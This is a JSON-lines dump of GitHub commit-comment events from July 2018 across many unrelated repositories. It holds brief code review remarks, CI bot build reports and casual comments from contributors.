{"id":"7997522999","type":"CommitCommentEvent","actor":{"login":"dcandido"},"repo":{"name":"dcandido/crawl"},"payload":{"comment":{"id":29785635,"position":null,"line":null,"path":null,"commit_id":"46bb6f1d53392f3cb46fdca97be391081d181f62","created_at":"2018-07-20T22:48:12Z","updated_at":"2018-07-20T22:48:12Z","author_association":"OWNER","body":"this also removed Zot Trap banishment"}},"created_at":"2018-07-20T22:48:12Z"}
{"id":"7997523126","type":"CommitCommentEvent","actor":{"login":"wilsonsilva80"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29785636,"position":null,"line":null,"path":null,"commit_id":"abd5fccf9a69546e75d9c178379d3ef92405719e","created_at":"2018-07-20T22:48:15Z","updated_at":"2018-07-20T22:48:15Z","author_association":"NONE","body":"@Ahmedfarghal in line 45 you have `showingContacts.contacts.map`, delete the `contacts`"}},"created_at":"2018-07-20T22:48:15Z"}
{"id":"7997524583","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29785640,"position":null,"line":null,"path":null,"commit_id":"1f2e7628712e0b071dc499fcdf9e1ac6398510c3","created_at":"2018-07-20T22:48:51Z","updated_at":"2018-07-20T22:48:51Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/1f2e7628712e0b071dc499fcdf9e1ac6398510c3/index.html"}},"created_at":"2018-07-20T22:48:51Z"}
{"id":"7997524986","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785641,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-20T22:49:00Z","updated_at":"2018-07-20T22:49:00Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: Tests Failed (764 of 2319 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-32.95%25-red.png)</a> \n"}},"created_at":"2018-07-20T22:49:00Z"}
{"id":"7997525335","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29785642,"position":null,"line":null,"path":null,"commit_id":"e4160ec913e802937728255c9027064692c42e84","created_at":"2018-07-20T22:49:08Z","updated_at":"2018-07-20T22:49:08Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-242](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-242).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-242-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T22:49:08Z"}
{"id":"7997526462","type":"CommitCommentEvent","actor":{"login":"ericgiannini"},"repo":{"name":"Nexmo/nexmo-developer"},"payload":{"comment":{"id":29785646,"position":null,"line":null,"path":null,"commit_id":"f8db73e43c89ddbd3e91e4c2e388e7b3afdf7d3b","created_at":"2018-07-20T22:49:35Z","updated_at":"2018-07-20T22:49:35Z","author_association":"CONTRIBUTOR","body":"👍🏿"}},"created_at":"2018-07-20T22:49:35Z"}
{"id":"7997528040","type":"CommitCommentEvent","actor":{"login":"rjmyoffice"},"repo":{"name":"rjmyoffice/ionic"},"payload":{"comment":{"id":29785650,"position":null,"line":null,"path":null,"commit_id":"01c527f11908b468c6a994f39ebe1f98764e39cb","created_at":"2018-07-20T22:50:14Z","updated_at":"2018-07-20T22:50:14Z","author_association":"OWNER","body":"Initial"}},"created_at":"2018-07-20T22:50:14Z"}
{"id":"7997530586","type":"CommitCommentEvent","actor":{"login":"fubar"},"repo":{"name":"AuroraDAO/idex-api-docs"},"payload":{"comment":{"id":29785659,"position":5,"line":567,"path":"README.md","commit_id":"1601a247ae54b34ae80b65477aa741dc474a22cf","created_at":"2018-07-20T22:51:13Z","updated_at":"2018-07-20T22:51:13Z","author_association":"CONTRIBUTOR","body":"These changes have now been released. No changes to the REST API at the moment."}},"created_at":"2018-07-20T22:51:13Z"}
{"id":"7997530831","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"dubzzz/javascript-algorithms"},"payload":{"comment":{"id":29785660,"position":6,"line":71,"path":"src/algorithms/sorting/counting-sort/__test__/CountingSort.test.js","commit_id":"34b0c46df41fc18ab839be8c8bdece556d3b5d70","created_at":"2018-07-20T22:51:18Z","updated_at":"2018-07-20T22:51:18Z","author_association":"OWNER","body":"Current implementation of CountingSort does not take into account negative numbers"}},"created_at":"2018-07-20T22:51:18Z"}
{"id":"7997532216","type":"CommitCommentEvent","actor":{"login":"dubzzz"},"repo":{"name":"dubzzz/javascript-algorithms"},"payload":{"comment":{"id":29785666,"position":6,"line":29,"path":"src/algorithms/sorting/radix-sort/__test__/RadixSort.test.js","commit_id":"34b0c46df41fc18ab839be8c8bdece556d3b5d70","created_at":"2018-07-20T22:51:53Z","updated_at":"2018-07-20T22:51:53Z","author_association":"OWNER","body":"Current implementation of RadixSort has trouble with negative numbers"}},"created_at":"2018-07-20T22:51:53Z"}
{"id":"7997532969","type":"CommitCommentEvent","actor":{"login":"VictorML11"},"repo":{"name":"ProSavage/SavageFactions"},"payload":{"comment":{"id":29785667,"position":null,"line":null,"path":null,"commit_id":"da329703894be981d5e0653b13b4d8d76c826ade","created_at":"2018-07-20T22:52:11Z","updated_at":"2018-07-20T22:52:11Z","author_association":"NONE","body":"Is always good to see my bug fixes applied at least in one factions."}},"created_at":"2018-07-20T22:52:11Z"}
{"id":"7997536386","type":"CommitCommentEvent","actor":{"login":"VictorML11"},"repo":{"name":"ProSavage/SavageFactions"},"payload":{"comment":{"id":29785675,"position":null,"line":null,"path":null,"commit_id":"143daad9e63b59c8add70df1a677fccc97f76585","created_at":"2018-07-20T22:53:36Z","updated_at":"2018-07-20T22:53:36Z","author_association":"NONE","body":"Here it is again :)"}},"created_at":"2018-07-20T22:53:36Z"}
{"id":"7997537293","type":"CommitCommentEvent","actor":{"login":"karanjthakkar"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29785681,"position":5,"line":447,"path":"React/Views/ScrollView/RCTScrollView.m","commit_id":"f96d7ae6486eb245496c0fef07239ae0480e88b6","created_at":"2018-07-20T22:54:01Z","updated_at":"2018-07-20T22:54:01Z","author_association":"CONTRIBUTOR","body":"Issue created: https://github.com/facebook/react-native/issues/20324 👍 "}},"created_at":"2018-07-20T22:54:01Z"}
{"id":"7997538035","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29785682,"position":null,"line":null,"path":null,"commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-20T22:54:20Z","updated_at":"2018-07-20T22:54:20Z","author_association":"OWNER","body":"También:\r\n  Se agrego para ver la velosidad de la descarga\r\n  Service workers\r\n"}},"created_at":"2018-07-20T22:54:20Z"}
{"id":"7997539520","type":"CommitCommentEvent","actor":{"login":"MoNTE48"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":29785687,"position":null,"line":null,"path":null,"commit_id":"ea86ecf015cd82d2daa4c0f4a82096402290a5a6","created_at":"2018-07-20T22:55:00Z","updated_at":"2018-07-20T22:55:00Z","author_association":"CONTRIBUTOR","body":"I meant that gradle 3.1.3 AVAILABLE on maven. You need add this line\r\nmaven { url 'https://maven.google.com' }\r\n"}},"created_at":"2018-07-20T22:55:00Z"}
{"id":"7997539683","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29785688,"position":10,"line":10,"path":"src/client/SucreCloudIndex/index.js","commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-20T22:55:04Z","updated_at":"2018-07-20T22:55:04Z","author_association":"OWNER","body":"Descomentar para activar Service Worker, para produccion"}},"created_at":"2018-07-20T22:55:04Z"}
{"id":"7997542871","type":"CommitCommentEvent","actor":{"login":"nerzhul"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":29785692,"position":null,"line":null,"path":null,"commit_id":"ea86ecf015cd82d2daa4c0f4a82096402290a5a6","created_at":"2018-07-20T22:56:21Z","updated_at":"2018-07-20T22:56:21Z","author_association":"MEMBER","body":"the commit message was exact: \"gradle 3.1.3 plugin is not available on maven central\", but i agree it's available on google third party repo"}},"created_at":"2018-07-20T22:56:21Z"}
{"id":"7997548217","type":"CommitCommentEvent","actor":{"login":"1Bennell"},"repo":{"name":"nallan/a-b-chi"},"payload":{"comment":{"id":29785711,"position":29,"line":32,"path":"README.md","commit_id":"064b8626b0c22cb49087c79564c54c3141719656","created_at":"2018-07-20T22:58:39Z","updated_at":"2018-07-20T22:58:39Z","author_association":"NONE","body":"Installation"}},"created_at":"2018-07-20T22:58:39Z"}
{"id":"7997551619","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785716,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-20T23:00:00Z","updated_at":"2018-07-20T23:00:00Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2339 of 2339 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-20T23:00:00Z"}
{"id":"7997554591","type":"CommitCommentEvent","actor":{"login":"eldar-nurt"},"repo":{"name":"frogh/StickerBot"},"payload":{"comment":{"id":29785724,"position":null,"line":null,"path":null,"commit_id":"d45fae55eccb5af928679547edaa6a6eec501122","created_at":"2018-07-20T23:01:08Z","updated_at":"2018-07-20T23:01:08Z","author_association":"NONE","body":"Some sex in ur code\r\nI guess with that)"}},"created_at":"2018-07-20T23:01:08Z"}
{"id":"7997558083","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29785733,"position":null,"line":null,"path":null,"commit_id":"9ba9c4842298a26b5b842394501619491f382092","created_at":"2018-07-20T23:02:27Z","updated_at":"2018-07-20T23:02:27Z","author_association":"CONTRIBUTOR","body":"\"Themselfes\" sollte durch \"themselves\" ersetzt werden. 😏"}},"created_at":"2018-07-20T23:02:27Z"}
{"id":"7997563048","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29785742,"position":null,"line":null,"path":null,"commit_id":"ac688da82fce5303a068419c86b2aa70724d2958","created_at":"2018-07-20T23:04:36Z","updated_at":"2018-07-20T23:04:36Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-242](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-242).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-242-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T23:04:36Z"}
{"id":"7997564457","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785745,"position":null,"line":null,"path":null,"commit_id":"a2c22cb63eb1131ca4a170e7a4030adffa6a1296","created_at":"2018-07-20T23:05:15Z","updated_at":"2018-07-20T23:05:15Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a2c22cb63eb1131ca4a170e7a4030adffa6a1296-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T23:05:15Z"}
{"id":"7997567894","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29785750,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-20T23:06:38Z","updated_at":"2018-07-20T23:06:38Z","author_association":"CONTRIBUTOR","body":"uwuwu"}},"created_at":"2018-07-20T23:06:38Z"}
{"id":"7997568027","type":"CommitCommentEvent","actor":{"login":"ubiyca5"},"repo":{"name":"ubiyca5/rubylesson"},"payload":{"comment":{"id":29785751,"position":17,"line":17,"path":"lesson_1/ideal_weigth.rb","commit_id":"130359db57e1919110573c614e45f0ca6806d220","created_at":"2018-07-20T23:06:42Z","updated_at":"2018-07-20T23:06:42Z","author_association":"OWNER","body":"В принципе не нужен! Программа не ругается - я и оставил )) Даже Rubocop"}},"created_at":"2018-07-20T23:06:42Z"}
{"id":"7997569113","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29785754,"position":12,"line":12,"path":"devel/olm/Portfile","commit_id":"cca4eb7aa5ab00b72f995d46e2942370550fd14d","created_at":"2018-07-20T23:07:11Z","updated_at":"2018-07-20T23:07:11Z","author_association":"CONTRIBUTOR","body":"If it's C++11, then you should use `PortGroup cxx11 1.1` (after the `PortSystem` line)."}},"created_at":"2018-07-20T23:07:11Z"}
{"id":"7997569273","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"MJZ1977/Stockfish"},"payload":{"comment":{"id":29785755,"position":null,"line":null,"path":null,"commit_id":"77abc4c2ad29958132474e1deb1bcab052671b2c","created_at":"2018-07-20T23:07:15Z","updated_at":"2018-07-20T23:07:15Z","author_association":"NONE","body":"assert(a ^ b == (a & ~b) || (b & ~a));\r\n\r\nSo here i think you just want\r\n`b = attackedBy[Us][PAWN] & ~attackedBy2[Us];`\r\n\r\nand it would be faster...\r\n\r\nOr I'm I missing something?\r\n\r\nAn alternative is to compute in bitboard.h\r\n```\r\ntemplate<Color C>\r\nconstexpr Bitboard dble_attacks_bb(Bitboard b) {\r\n  return C == WHITE ? shift<NORTH_WEST>(b) & shift<NORTH_EAST>(b)\r\n                    : shift<SOUTH_WEST>(b) & shift<SOUTH_EAST>(b);\r\n}\r\n```\r\n\r\nand simply use\r\n`attackedBy2[Us] |= dble_attacks_bb(pos.pieces(Us, PAWN));`\r\n\r\n"}},"created_at":"2018-07-20T23:07:15Z"}
{"id":"7997570013","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29785758,"position":25,"line":25,"path":"devel/olm/Portfile","commit_id":"cca4eb7aa5ab00b72f995d46e2942370550fd14d","created_at":"2018-07-20T23:07:33Z","updated_at":"2018-07-20T23:07:33Z","author_association":"CONTRIBUTOR","body":"You don't need this line because this is the default `build.cmd`."}},"created_at":"2018-07-20T23:07:33Z"}
{"id":"7997570960","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29785761,"position":27,"line":27,"path":"devel/olm/Portfile","commit_id":"cca4eb7aa5ab00b72f995d46e2942370550fd14d","created_at":"2018-07-20T23:08:00Z","updated_at":"2018-07-20T23:08:00Z","author_association":"CONTRIBUTOR","body":"Instead of these two lines, you should set `build.target static`."}},"created_at":"2018-07-20T23:08:00Z"}
{"id":"7997572681","type":"CommitCommentEvent","actor":{"login":"ryandesign"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29785770,"position":23,"line":23,"path":"devel/olm/Portfile","commit_id":"cca4eb7aa5ab00b72f995d46e2942370550fd14d","created_at":"2018-07-20T23:08:45Z","updated_at":"2018-07-20T23:08:45Z","author_association":"CONTRIBUTOR","body":"Because of this, you must make other arrangements for [using the right compiler and `-arch` flags](https://trac.macports.org/wiki/UsingTheRightCompiler)."}},"created_at":"2018-07-20T23:08:45Z"}
{"id":"7997572842","type":"CommitCommentEvent","actor":{"login":"matthewhammer"},"repo":{"name":"Adapton/fungi-lang.rust"},"payload":{"comment":{"id":29785771,"position":22,"line":493,"path":"src/examples/list_nat.rs","commit_id":"f689a1faf733aee30c3e486f029c0f56bb4ce8f1","created_at":"2018-07-20T23:08:49Z","updated_at":"2018-07-20T23:08:49Z","author_association":"MEMBER","body":"@jpw234 This merge is still has git artifacts in it.  Can you fix it again?"}},"created_at":"2018-07-20T23:08:49Z"}
{"id":"7997575994","type":"CommitCommentEvent","actor":{"login":"Rubeelahmad"},"repo":{"name":"uttejh/Loan-Management-Sysytem"},"payload":{"comment":{"id":29785779,"position":null,"line":null,"path":null,"commit_id":"ed794afe1b78fbd3a865f31e2a1d88484d729272","created_at":"2018-07-20T23:10:12Z","updated_at":"2018-07-20T23:10:12Z","author_association":"NONE","body":"Very well done!!! Thanks for sharing this 👍 "}},"created_at":"2018-07-20T23:10:12Z"}
{"id":"7997576153","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Aryeh245/Rank-Vouchers"},"payload":{"comment":{"id":29785780,"position":null,"line":null,"path":null,"commit_id":"7003a357af7dfcf45a63dbfe49729ed12ca30dce","created_at":"2018-07-20T23:10:16Z","updated_at":"2018-07-20T23:10:16Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Aryeh245/Rank-Vouchers/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `0f34ea98-8c72-11e8-9f2f-2923fd003fd7`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-20T23:10:16Z"}
{"id":"7997576648","type":"CommitCommentEvent","actor":{"login":"Rubeelahmad"},"repo":{"name":"uttejh/Loan-Management-Sysytem"},"payload":{"comment":{"id":29785783,"position":null,"line":null,"path":null,"commit_id":"ed794afe1b78fbd3a865f31e2a1d88484d729272","created_at":"2018-07-20T23:10:28Z","updated_at":"2018-07-20T23:10:28Z","author_association":"NONE","body":"Nice work done"}},"created_at":"2018-07-20T23:10:28Z"}
{"id":"7997577083","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29785785,"position":null,"line":null,"path":null,"commit_id":"9ba9c4842298a26b5b842394501619491f382092","created_at":"2018-07-20T23:10:39Z","updated_at":"2018-07-20T23:10:39Z","author_association":"CONTRIBUTOR","body":"\"Themselfes\" sollte durch \"themselves\" ersetzt werden. 😏"}},"created_at":"2018-07-20T23:10:39Z"}
{"id":"7997577487","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Aryeh245/Rank-Vouchers"},"payload":{"comment":{"id":29785786,"position":null,"line":null,"path":null,"commit_id":"2dce12370bf841220757e4be84e83ce4b95bc274","created_at":"2018-07-20T23:10:49Z","updated_at":"2018-07-20T23:10:49Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Aryeh245/Rank-Vouchers/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `230a18ae-8c72-11e8-80d2-059efb7a7d9b`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-20T23:10:49Z"}
{"id":"7997579334","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Aryeh245/Rank-Vouchers"},"payload":{"comment":{"id":29785790,"position":null,"line":null,"path":null,"commit_id":"ad64d561e5d1f56d2a72045a018f03d56735757b","created_at":"2018-07-20T23:11:35Z","updated_at":"2018-07-20T23:11:35Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Aryeh245/Rank-Vouchers/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `3e789c50-8c72-11e8-9922-8342eef01f5c`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-20T23:11:35Z"}
{"id":"7997581349","type":"CommitCommentEvent","actor":{"login":"guycalledfrank"},"repo":{"name":"playcanvas/engine"},"payload":{"comment":{"id":29785793,"position":31,"line":862,"path":"src/graphics/program-lib/standard.js","commit_id":"49b5acc47a762e26436d146509c3bd65fba36088","created_at":"2018-07-20T23:12:27Z","updated_at":"2018-07-20T23:12:27Z","author_association":"CONTRIBUTOR","body":"Heightmap never has uvOffset - namely because it IS the source of this offset"}},"created_at":"2018-07-20T23:12:27Z"}
{"id":"7997581409","type":"CommitCommentEvent","actor":{"login":"someblu"},"repo":{"name":"fang2hou/ElvUI_WindTools"},"payload":{"comment":{"id":29785794,"position":null,"line":null,"path":null,"commit_id":"40b87ffcae06d33881074c205d6a17f766bcac6b","created_at":"2018-07-20T23:12:29Z","updated_at":"2018-07-20T23:12:29Z","author_association":"COLLABORATOR","body":"今天客户端更新后发现GetQuestLogIndexByID能正常调用了。"}},"created_at":"2018-07-20T23:12:29Z"}
{"id":"7997585631","type":"CommitCommentEvent","actor":{"login":"cb0wman"},"repo":{"name":"superRaytin/paginationjs"},"payload":{"comment":{"id":29785800,"position":null,"line":null,"path":null,"commit_id":"542ade3b55b624e784a385cc99c8eed6e9d51f68","created_at":"2018-07-20T23:14:17Z","updated_at":"2018-07-20T23:14:17Z","author_association":"NONE","body":"If attibutes.ajax is defined as an object the values specified are overwritten with empty object, e.g. {}.  Loosing specified ajax options.\r\n\r\nso if defined attribute ajax as:\r\najax: {data: something: 'new', type: 'POST', ...}\r\nThe attributes I wanted are extended onto formatAjaxParams.\r\n\r\npossible change:\r\nln. 359\r\nvar ajaxParams = $.isFunction(attributes.ajax) ? attributes.ajax() : attributes.ajax;"}},"created_at":"2018-07-20T23:14:17Z"}
{"id":"7997586153","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Aryeh245/Rank-Vouchers"},"payload":{"comment":{"id":29785801,"position":null,"line":null,"path":null,"commit_id":"bc1feecbc131d44c04d4c64739cd61ddc2b67069","created_at":"2018-07-20T23:14:29Z","updated_at":"2018-07-20T23:14:29Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Aryeh245/Rank-Vouchers/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `a69b92ba-8c72-11e8-91bf-6fde7f6a9057`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-20T23:14:29Z"}
{"id":"7997587036","type":"CommitCommentEvent","actor":{"login":"daredevildave"},"repo":{"name":"playcanvas/engine"},"payload":{"comment":{"id":29785803,"position":31,"line":862,"path":"src/graphics/program-lib/standard.js","commit_id":"49b5acc47a762e26436d146509c3bd65fba36088","created_at":"2018-07-20T23:14:53Z","updated_at":"2018-07-20T23:14:53Z","author_association":"CONTRIBUTOR","body":"Checking because I've altered some of this code here: https://github.com/playcanvas/engine/pull/1251"}},"created_at":"2018-07-20T23:14:53Z"}
{"id":"7997587079","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785804,"position":null,"line":null,"path":null,"commit_id":"8ea09e967af38f96d3427fd9ee1fe4b3cfc47b89","created_at":"2018-07-20T23:14:54Z","updated_at":"2018-07-20T23:14:54Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/professional-services](https://allenfearp-static-docs.pantheonsite.io/docs/professional-services)\n"}},"created_at":"2018-07-20T23:14:54Z"}
{"id":"7997587739","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Aryeh245/Rank-Vouchers"},"payload":{"comment":{"id":29785808,"position":null,"line":null,"path":null,"commit_id":"4dfe2674fd6104e5e347d33efa4d3fd7049a71c9","created_at":"2018-07-20T23:15:11Z","updated_at":"2018-07-20T23:15:11Z","author_association":"NONE","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 10\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Aryeh245/Rank-Vouchers/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `bf782e4c-8c72-11e8-94ca-d87c72be0d9d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-20T23:15:11Z"}
{"id":"7997592257","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29785816,"position":null,"line":null,"path":null,"commit_id":"2b5549d6deef06db1f3055e9ea8ddce7a2f8993f","created_at":"2018-07-20T23:17:11Z","updated_at":"2018-07-20T23:17:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-29](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-29-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-20T23:17:11Z"}
